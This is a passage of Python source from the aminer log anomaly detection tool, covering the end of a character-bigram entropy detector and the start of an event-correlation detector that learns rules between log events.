["o", 30], ["n", 5298], ["p", 28], ["s", 930], ["r", 122], ["t", 8656], ["v", 100], ["x", 2], ["z", 2]]], ["M", [["!", 4], [" ", 68], ["\"", 2], ["'", 12], ["-", 4], [",", 12], ["/", 8], [".", 1208], [":", 2], ["A", 346], ["C", 28], ["B", 34], ["E", 243], ["D", 6], ["G", 12], ["I", 130], ["M", 24], ["L", 2], ["O", 117], ["N", 16], ["P", 50], ["S", 26], ["R", 8], ["U", 28], ["W", 6], ["Y", 24], ["a", 8688], ["c", 378], ["e", 1576], ["f", 2], ["i", 2158], ["o", 4266], ["s", 2], ["r", 2578], ["u", 518], ["y", 1492]]], ["Q", [["U", 48], ["C", 2], ["u", 494], [".", 4]]], ["U", [["!", 2], [" ", 106], ["'", 6], [",", 2], [".", 10], ["A", 16], ["C", 48], ["B", 24], ["E", 54], ["D", 44], ["G", 12], ["F", 6], ["I", 12], ["K", 2], ["M", 60], ["L", 68], ["N", 116], ["P", 26], ["S", 130], ["R", 182], ["U", 2], ["T", 156], ["V", 2], ["Z", 6], ["c", 2], ["g", 12], ["h", 34], ["k", 4], ["m", 16], ["l", 30], ["n", 859], ["p", 360], ["s", 32], ["r", 68], ["t", 50], ["v", 16]]], ["Y", [["!", 4], [" ", 260], ["\"", 2], ["'", 4], ["-", 68], [",", 10], [".", 22], [";", 2], ["A", 2], ["B", 2], ["E", 26], ["L", 4], ["O", 112], ["S", 26], ["R", 4], ["T", 2], ["a", 122], ["c", 2], ["e", 1328], ["i", 10], ["o", 3878], ["s", 10], ["u", 26], ["v", 8]]], ["]", [["!", 2], [" ", 322], ["J", 2], ["-", 2], [",", 44], [".", 14], [";", 24], [">", 2]]], ["a", [["!", 310], [" ", 65518], ["\"", 24], ["'", 716], [")", 20], ["*", 1], ["-", 724], [",", 2766], [".", 1558], ["1", 2], [";", 152], [":", 30], ["?", 144], [">", 2], ["S", 2], ["_", 6], ["a", 122], ["`", 6], ["c", 35608], ["b", 19042], ["e", 752], ["d", 56288], ["g", 18377], ["f", 7666], ["i", 47228], ["h", 1140], ["k", 13604], ["j", 480], ["m", 24754], ["l", 68865], ["o", 314], ["n", 216874], ["q", 102], ["p", 18548], ["s", 105951], ["r", 97182], ["u", 12725], ["t", 135418], ["w", 10880], ["v", 25744], ["y", 29029], ["x", 666], ["z", 1906], ["}", 2]]], ["e", [["!", 3010], [" ", 487805], ["\"", 166], ["'", 4249], [")", 336], ["*", 10], ["-", 4298], [",", 40540], [".", 24278], [";", 3704], [":", 890], ["?", 2866], [">", 78], ["B", 2], ["I", 2], ["S", 2], ["[", 6], ["]", 18], ["_", 42], ["a", 79086], ["`", 2], ["c", 27918], ["b", 1598], ["e", 45884], ["d", 142368], ["g", 8394], ["f", 13916], ["i", 18692], ["h", 2842], ["k", 1590], ["j", 380], ["m", 31126], ["l", 54118], ["o", 4898], ["n", 129345], ["q", 1706], ["p", 17078], ["s", 100714], ["r", 205409], ["u", 2658], ["t", 41944], ["w", 11422], ["v", 24561], ["y", 23800], ["x", 14052], ["z", 560], ["}", 4]]], ["i", [["!", 50], [" ", 1222], ["\"", 2], ["'", 184], [")", 4], ["*", 2], ["-", 384], [",", 450], [".", 254], [";", 14], [":", 6], ["?", 14], ["@", 2], ["G", 2], ["Y", 2], ["]", 2], ["_", 8], ["a", 10716], ["c", 45183], ["b", 6986], ["e", 33445], ["d", 40015], ["g", 26388], ["f", 17002], ["i", 24], ["h", 72], ["k", 7006], ["j", 18], ["m", 40198], ["l", 43870], ["o", 33038], ["n", 232657], ["q", 394], ["p", 5884], ["s", 107323], ["r", 32008], ["u", 1844], ["t", 102683], ["w", 38], ["v", 16166], ["y", 2], ["x", 2074], ["z", 2892]]], ["m", [["!", 462], [" ", 35852], ["\"", 24], ["'", 294], [")", 58], ["-", 610], [",", 7564], [".", 6290], ["1", 2], [";", 758], [":", 298], ["?", 470], [">", 22], ["]", 2], ["a", 45673], ["c", 96], ["b", 7420], ["e", 83120], ["d", 36], ["g", 4], ["f", 768], ["i", 24836], ["h", 10], ["k", 22], ["m", 5770], ["l", 522], ["o", 32940], ["n", 1218], ["p", 15046], ["s", 8640], ["r", 202], ["u", 10278], ["t", 200], ["w", 24], ["y", 17480]]], ["q", [["a", 2], [" ", 2], ["u", 12073], [",", 2], ["'", 2]]], ["u", [["!", 428], [" ", 17752], ["\"", 16], ["'", 1182], [")", 6], ["-", 186], [",", 1924], [".", 1140], [";", 124], [":", 18], ["?", 428], ["S", 12], ["T", 2], ["_", 2], ["a", 6632], ["c", 12934], ["b", 5730], ["e", 10797], ["d", 6988], ["g", 18286], ["f", 2056], ["i", 9148], ["h", 30], ["k", 496], ["j", 84], ["m", 8440], ["l", 37068], ["o", 708], ["n", 43221], ["q", 64], ["p", 17232], ["s", 44836], ["r", 48568], ["u", 18], ["t", 49162], ["w", 10], ["v", 428], ["y", 210], ["x", 498], ["z", 722]]], ["y", [["!", 1032], [" ", 118640], ["\"", 62], ["'", 1440], [")", 154], ["-", 2010], [",", 18388], [".", 10860], [";", 1366], [":", 466], ["?", 946], [">", 26], ["]", 2], ["_", 4], ["a", 2624], ["`", 2], ["c", 242], ["b", 640], ["e", 11272], ["d", 206], ["g", 138], ["f", 198], ["i", 4422], ["h", 84], ["k", 76], ["m", 714], ["l", 818], ["o", 28106], ["n", 212], ["p", 410], ["s", 8723], ["r", 738], ["u", 58], ["t", 3028], ["w", 464], ["v", 110], ["x", 14], ["z", 40]]], ["}", [[" ", 6], [",", 2]]]]] # skipcq: FLK-E501 for elem in default_f[2]: first_char = int.from_bytes(bytes(elem[0], AminerConfig.ENCODING), 'big') second_char_list = elem[1] self.freq[first_char] = {} for second_char_elem in second_char_list: second_char = int.from_bytes(bytes(second_char_elem[0], AminerConfig.ENCODING), 'big') frequency = second_char_elem[1] self.freq[first_char][second_char] = frequency # Load frequency table from persisted data. Note that this adds to entries in the default frequency table if used. self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for elem in persistence_data: first_char = elem[0] second_char_list = elem[1] if first_char not in self.freq: self.freq[first_char] = {} for second_char_elem in second_char_list: second_char = second_char_elem[0] frequency = second_char_elem[1] if second_char not in self.freq[first_char]: self.freq[first_char][second_char] = 0 self.freq[first_char][second_char] += frequency self.total_freq = {} for first_char, second_char_dict in self.freq.items(): self.total_freq[first_char] = sum(second_char_dict.values()) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 parser_match = log_atom.parser_match if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip atom when ignore paths in atom or constraint paths not in atom. all_paths_set = set(parser_match.get_match_dictionary().keys()) if len(all_paths_set.intersection(self.ignore_list)) > 0 \ or len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list): return # Store all values from target target_path_list in a list. values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: value = match.match_object if value is not None: all_values_none = False values.append(value) if all_values_none is True: return for value in values: probs = [] # Iterate over all characters (+ virtual characters before and after value) # and check occurrence frequencies of ith and (i+1)th character for i in range(-1, len(value)): # Use -1 as placeholder for character before first actual character of value first_char = -1 if i != -1: first_char = value[i] # Use -1 as placeholder for character after last actual character of value second_char = -1 if i != len(value) - 1: second_char = value[i + 1] prob = 0 if first_char in self.freq and second_char in self.freq[first_char]: prob = self.freq[first_char][second_char] / self.total_freq[first_char] probs.append(prob) critical_val = sum(probs) / len(probs) if critical_val < self.prob_thresh: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': [value.decode(AminerConfig.ENCODING)], 'CriticalValue': critical_val, 'ProbabilityThreshold': self.prob_thresh} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Value entropy anomaly detected', sorted_log_lines, event_data, log_atom, self) # Extend frequency table if learn mode is active. if self.learn_mode is True: for value in values: if self.skip_repetitions is True: # Do not consider repeating values multiple times for extending frequency table to avoid distortions. if value in self.value_set: continue self.value_set.add(value) for i in range(-1, len(value)): first_char = -1 if i != -1: first_char = value[i] second_char = -1 if i != len(value) - 1: second_char = value[i + 1] if first_char in self.freq: self.total_freq[first_char] += 1 if second_char in self.freq[first_char]: self.freq[first_char][second_char] += 1 else: self.freq[first_char][second_char] = 1 else: self.total_freq[first_char] = 1 self.freq[first_char] = {} self.freq[first_char][second_char] = 1 if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" lst = [] for first_char, second_char_elem in self.freq.items(): sublst = [] for second_char, frequency in second_char_elem.items(): sublst.append([second_char, frequency]) lst.append([first_char, sublst]) PersistenceUtil.store_json(self.persistence_file_name, lst) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 EventCorrelationDetector.py000066400000000000000000001450261437606560100363120ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an evaluator and generator for event rules. The overall idea of generation is 1) For each processed event A, randomly select another event B occurring within queue_delta_time. 2) If B chronologically occurs after A, create the hypothesis A => B (observing event A implies that event B must be observed within current_time+queue_delta_time). If B chronologically occurs before A, create the hypothesis B <= A (observing event A implies that event B must be observed within currentTime-queueDeltaTime). 3) Observe for a long time (max_observations) whether the hypothesis holds. 4) If the hypothesis holds, transform it to a rule. Otherwise, discard the hypothesis. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from collections import deque import random import math import time import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class tries to find time correlation patterns between different log atom events.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, max_hypotheses=1000, hypothesis_max_delta_time=5.0, generation_probability=1.0, generation_factor=1.0, max_observations=500, p0=0.9, alpha=0.05, candidates_size=10, hypotheses_eval_delta_time=120.0, delta_time_to_discard_hypothesis=180.0, check_rules_flag=False, learn_mode=True, ignore_list=None, persistence_id='Default', output_logline=True, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param max_hypotheses maximum amount of hypotheses and rules hold in memory. @param hypothesis_max_delta_time time span of events considered for hypothesis generation. @param generation_probability probability in [0, 1] that currently processed log line is considered for hypothesis with each of the candidates. @param generation_factor likelihood in [0, 1] that currently processed log line is added to the set of candidates for hypothesis generation. @param max_observations maximum amount of evaluations before hypothesis is transformed into a rule or discarded or rule is evaluated. @param p0 expected value for hypothesis evaluation distribution. @param alpha confidence value for hypothesis evaluation. @param candidates_size maximum number of stored candidates used for hypothesis generation. @param hypotheses_eval_delta_time duration between hypothesis evaluation phases that remove old hypotheses that are likely to remain unused. @param delta_time_to_discard_hypothesis time span required for old hypotheses to be discarded. @param check_rules_flag specifies whether existing rules are evaluated. @param learn_mode specifies whether new hypotheses are generated. @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param persistence_id name of persistence file. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, max_hypotheses=max_hypotheses, hypothesis_max_delta_time=hypothesis_max_delta_time, generation_probability=generation_probability, generation_factor=generation_factor, max_observations=max_observations, p0=p0, alpha=alpha, candidates_size=candidates_size, hypotheses_eval_delta_time=hypotheses_eval_delta_time, delta_time_to_discard_hypothesis=delta_time_to_discard_hypothesis, check_rules_flag=check_rules_flag, learn_mode=learn_mode, ignore_list=ignore_list, persistence_id=persistence_id, output_logline=output_logline, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.last_unhandled_match = None self.total_records = 0 self.forward_hypotheses = {} self.back_hypotheses = {} self.forward_hypotheses_inv = {} self.back_hypotheses_inv = {} self.last_hypotheses_eval_timestamp = -1.0 self.forward_rule_queue = deque([]) self.back_rule_queue = deque([]) self.forward_hypotheses_queue = deque([]) self.back_hypotheses_queue = deque([]) self.hypothesis_candidates = deque([]) self.sum_unstable_unknown_hypotheses = 0 self.last_event_occurrence = {} self.min_eval_true_dict = {} self.min_eval_true_dict_max_size = 1000 self.sample_events = {} self.back_rules = {} self.forward_rules = {} self.back_rules_inv = {} self.forward_rules_inv = {} # Compute the initial minimum amount of positive evaluations for hypotheses to become rules. # For rules, this value can be different and will be computed based on the sample observations. self.min_eval_true = self.get_min_eval_true(self.max_observations, self.p0, self.alpha) self.log_forward_rules_learned = 0 self.log_back_rules_learned = 0 self.log_new_forward_rules = [] self.log_new_back_rules = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.persistence_id = persistence_id persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for record in persistence_data: implication_direction = record[0] trigger_event = tuple(record[1]) implied_event = tuple(record[2]) max_obs = record[3] min_eval_t = record[4] rule = Implication(trigger_event, implied_event, None, max_obs, min_eval_t) rule.stable = 1 if implication_direction == 'back': if trigger_event in self.back_rules: self.back_rules[trigger_event].append(rule) else: self.back_rules[trigger_event] = [rule] if implied_event in self.back_rules_inv: self.back_rules_inv[implied_event].append(rule) else: self.back_rules_inv[implied_event] = [rule] elif implication_direction == 'forward': if trigger_event in self.forward_rules: self.forward_rules[trigger_event].append(rule) else: self.forward_rules[trigger_event] = [rule] if implied_event in self.forward_rules_inv: self.forward_rules_inv[implied_event].append(rule) else: self.forward_rules_inv[implied_event] = [rule] logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) # skipcq: PYL-R1710 def get_min_eval_true(self, max_observations, p0, alpha): """ Compute the critical value (minimal amount of true evaluations) for a hypothesis. The form of the hypothesis is implies with at least probability p0 to be accepted. This method tries to be efficient by - Storing already computed critical values in a dictionary - Swapping (1 - p0) and p0 and replace alpha with (1 - alpha) to reduce loops """ if (max_observations, p0, alpha) in self.min_eval_true_dict: return self.min_eval_true_dict[(max_observations, p0, alpha)] sum1 = 0.0 max_observations_factorial = math.factorial(max_observations) i_factorial = 1 for i in range(max_observations + 1): i_factorial = i_factorial * max(i, 1) # No float conversion possible for huge numbers; use integer division. sum1 = sum1 + max_observations_factorial / (i_factorial * math.factorial(max_observations - i)) * ((1 - p0) ** i) * ( p0 ** (max_observations - i)) if sum1 > (1 - alpha): if len(self.min_eval_true_dict) <= self.min_eval_true_dict_max_size: # Store common values for fast retrieval self.min_eval_true_dict[(max_observations, p0, alpha)] = max_observations - i return max_observations - i def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 if log_atom.get_timestamp() is None: log_atom.atom_time = time.time() if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False parser_match = log_atom.parser_match self.total_records += 1 # Skip paths from ignore_list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary(): return if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return log_event = tuple(parser_match.get_match_dictionary()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return log_event = tuple(values) # Store last seen sample event to improve output. self.sample_events[log_event] = log_atom.raw_data if self.check_rules_flag: # Only check rules without generating new hypotheses. # Trigger implication A => B when A occurs. if log_event in self.forward_rules: for rule in self.forward_rules[log_event]: rule.rule_trigger_timestamps.append(log_atom.atom_time) self.forward_rule_queue.append(rule) # Resolve triggered implication A => B when B occurs. if log_event in self.forward_rules_inv: for rule in self.forward_rules_inv[log_event]: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in rule.rule_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != 'obs': break if trigger_timestamp_index != -1 and \ rule.rule_trigger_timestamps[trigger_timestamp_index] != 'obs' and \ rule.rule_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - self.hypothesis_max_delta_time: # Implication was triggered; append positive evaluation and mark as seen. rule.add_rule_observation(1) rule.rule_trigger_timestamps[trigger_timestamp_index] = 'obs' # Clean up triggered/resolved implications. while len(self.forward_rule_queue) > 0: rule = self.forward_rule_queue[0] if len(rule.rule_trigger_timestamps) == 0: # Triggered timestamp was already deleted somewhere else. self.forward_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] == 'obs': # Remove triggered timestamp. rule.rule_trigger_timestamps.popleft() self.forward_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: # Too much time has elapsed; append negative evaluation. rule.add_rule_observation(0) rule.rule_trigger_timestamps.popleft() self.forward_rule_queue.popleft() if not rule.evaluate_rule(): try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) tmp_string = f'Rule: {str(rule.trigger_event)} -> {str(rule.implied_event)}\n Expected: ' \ f'{str(rule.min_eval_true)}/{str(rule.max_observations)}\n Observed: ' \ f'{str(sum(rule.rule_observations))}/{str(len(rule.rule_observations))}' if self.output_logline: sorted_log_lines = [tmp_string + '\n' + original_log_line_prefix + data] else: sorted_log_lines = [tmp_string + data] for listener in self.anomaly_event_handlers: implied_event = None trigger_event = None if rule.implied_event in self.sample_events: implied_event = self.sample_events[rule.implied_event] if rule.trigger_event in self.sample_events: trigger_event = self.sample_events[rule.trigger_event] listener.receive_event( 'analysis.EventCorrelationDetector', f'Correlation rule violated! Event {repr(implied_event)} is missing, but should follow event ' f'{repr(trigger_event)}', sorted_log_lines, {'RuleInfo': {'Rule': str(rule.trigger_event) + '->' + str(rule.implied_event), 'Expected': str(rule.min_eval_true) + '/' + str(rule.max_observations), 'Observed': str(sum(rule.rule_observations)) + '/' + str(len(rule.rule_observations))}}, log_atom, self) rule.rule_observations = deque([]) continue break # Trigger implication B <= A when B occurs. if log_event in self.back_rules_inv: for rule in self.back_rules_inv[log_event]: rule.rule_trigger_timestamps.append(log_atom.atom_time) self.back_rule_queue.append(rule) # Resolve triggered implication B <= A when A occurs. if log_event in self.back_rules: for rule in self.back_rules[log_event]: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in rule.rule_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != 'obs': break if trigger_timestamp_index != -1 and \ rule.rule_trigger_timestamps[trigger_timestamp_index] != 'obs' and \ rule.rule_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - self.hypothesis_max_delta_time: rule.add_rule_observation(1) rule.rule_trigger_timestamps[trigger_timestamp_index] = 'obs' else: rule.add_rule_observation(0) if not rule.evaluate_rule(): try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) tmp_string = f'Rule: {str(rule.implied_event)} <- {str(rule.trigger_event)}\n Expected: ' \ f'{str(rule.min_eval_true)}/{str(rule.max_observations)}\n Observed: ' \ f'{str(sum(rule.rule_observations))}/{str(len(rule.rule_observations))}' if self.output_logline: sorted_log_lines = [tmp_string + '\n' + original_log_line_prefix + data] else: sorted_log_lines = [tmp_string + data] for listener in self.anomaly_event_handlers: implied_event = None trigger_event = None if rule.implied_event in self.sample_events: implied_event = self.sample_events[rule.implied_event] if rule.trigger_event in self.sample_events: trigger_event = self.sample_events[rule.trigger_event] listener.receive_event( 'analysis.EventCorrelationDetector', f'Correlation rule violated! Event {repr(implied_event)} is missing, but should precede event ' f'{repr(trigger_event)}', sorted_log_lines, {'RuleInfo': {'Rule': str(rule.implied_event) + '<-' + str(rule.trigger_event), 'Expected': str(rule.min_eval_true) + '/' + str(rule.max_observations), 'Observed': str(sum(rule.rule_observations)) + '/' + str(len(rule.rule_observations))}}, log_atom, self) rule.rule_observations = deque([]) # Clean up triggered/resolved implications. while len(self.back_rule_queue) > 0: rule = self.back_rule_queue[0] if len(rule.rule_trigger_timestamps) == 0: self.back_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] == 'obs': rule.rule_trigger_timestamps.popleft() self.back_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: rule.rule_trigger_timestamps.popleft() self.back_rule_queue.popleft() continue break if self.learn_mode: # Generate new hypotheses and rules. # Keep track of event occurrences, relevant for removing old hypotheses. self.last_event_occurrence[log_event] = log_atom.atom_time # Trigger implication A => B when A occurs. if log_event in self.forward_hypotheses: for implication in self.forward_hypotheses[log_event]: if implication.stable == 0: implication.hypothesis_trigger_timestamps.append(log_atom.atom_time) self.forward_hypotheses_queue.append(implication) # Resolve triggered implication A => B when B occurs. if log_event in self.forward_hypotheses_inv: delete_hypotheses = [] for implication in self.forward_hypotheses_inv[log_event]: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in implication.hypothesis_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != 'obs': break if trigger_timestamp_index != -1 and \ str(implication.hypothesis_trigger_timestamps[trigger_timestamp_index]) != 'obs' and \ implication.hypothesis_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - \ self.hypothesis_max_delta_time and \ implication.stable == 0: implication.add_hypothesis_observation(1, log_atom.atom_time) # Mark this timestamp as observed implication.hypothesis_trigger_timestamps[trigger_timestamp_index] = 'obs' # Since only true observations occur here, check for instability not necessary. if implication.compute_hypothesis_stability() == 1: # Update p and min_eval_true according to the results in the sample. p = implication.hypothesis_evaluated_true / implication.hypothesis_observations implication.min_eval_true = self.get_min_eval_true(self.max_observations, p, self.alpha) # Add hypothesis to rules. if implication.trigger_event in self.forward_rules: self.forward_rules[implication.trigger_event].append(implication) self.log_forward_rules_learned += 1 self.log_new_forward_rules.append(implication) else: self.forward_rules[implication.trigger_event] = [implication] self.log_forward_rules_learned += 1 self.log_new_forward_rules.append(implication) if implication.implied_event in self.forward_rules_inv: self.forward_rules_inv[implication.implied_event].append(implication) else: self.forward_rules_inv[implication.implied_event] = [implication] # Drop time stamps of previous observations, start new observations for rule. implication.hypothesis_trigger_timestamps.clear() self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 # Remove implication from list of hypotheses. self.forward_hypotheses[implication.trigger_event].remove(implication) delete_hypotheses.append(implication) for delete_hypothesis in delete_hypotheses: self.forward_hypotheses_inv[log_event].remove(delete_hypothesis) # Clean up triggered/resolved implications. while len(self.forward_hypotheses_queue) > 0: implication = self.forward_hypotheses_queue[0] if len(implication.hypothesis_trigger_timestamps) == 0: # Triggered timestamp was already deleted somewhere else. self.forward_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] == 'obs': # Remove triggered timestamp. implication.hypothesis_trigger_timestamps.popleft() self.forward_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: # Too much time has elapsed; append negative evaluation. implication.hypothesis_trigger_timestamps.popleft() implication.add_hypothesis_observation(0, log_atom.atom_time) if implication.compute_hypothesis_stability() == -1 and implication.trigger_event in self.forward_hypotheses and \ implication in self.forward_hypotheses[implication.trigger_event]: # This check is required if a hypothesis was already removed, but triggered hypotheses are still in the queue. self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 self.forward_hypotheses[implication.trigger_event].remove(implication) self.forward_hypotheses_inv[implication.implied_event].remove(implication) if len(self.forward_hypotheses[implication.trigger_event]) == 0: del self.forward_hypotheses[implication.trigger_event] if len(self.forward_hypotheses_inv[implication.implied_event]) == 0: del self.forward_hypotheses_inv[implication.implied_event] self.forward_hypotheses_queue.popleft() continue break # Trigger implication B <= A when B occurs. if log_event in self.back_hypotheses_inv: for implication in self.back_hypotheses_inv[log_event]: if implication.stable == 0: implication.hypothesis_trigger_timestamps.append(log_atom.atom_time) self.back_hypotheses_queue.append(implication) # Resolve triggered implication B <= A when A occurs. if log_event in self.back_hypotheses: delete_hypotheses = [] for implication in self.back_hypotheses[log_event]: if implication.stable == 0: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in implication.hypothesis_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != 'obs': break if trigger_timestamp_index != -1 and \ str(implication.hypothesis_trigger_timestamps[trigger_timestamp_index]) != 'obs' and \ implication.hypothesis_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - \ self.hypothesis_max_delta_time: implication.add_hypothesis_observation(1, log_atom.atom_time) implication.hypothesis_trigger_timestamps[trigger_timestamp_index] = 'obs' # Since only true observations occur here, check for instability not necessary. if 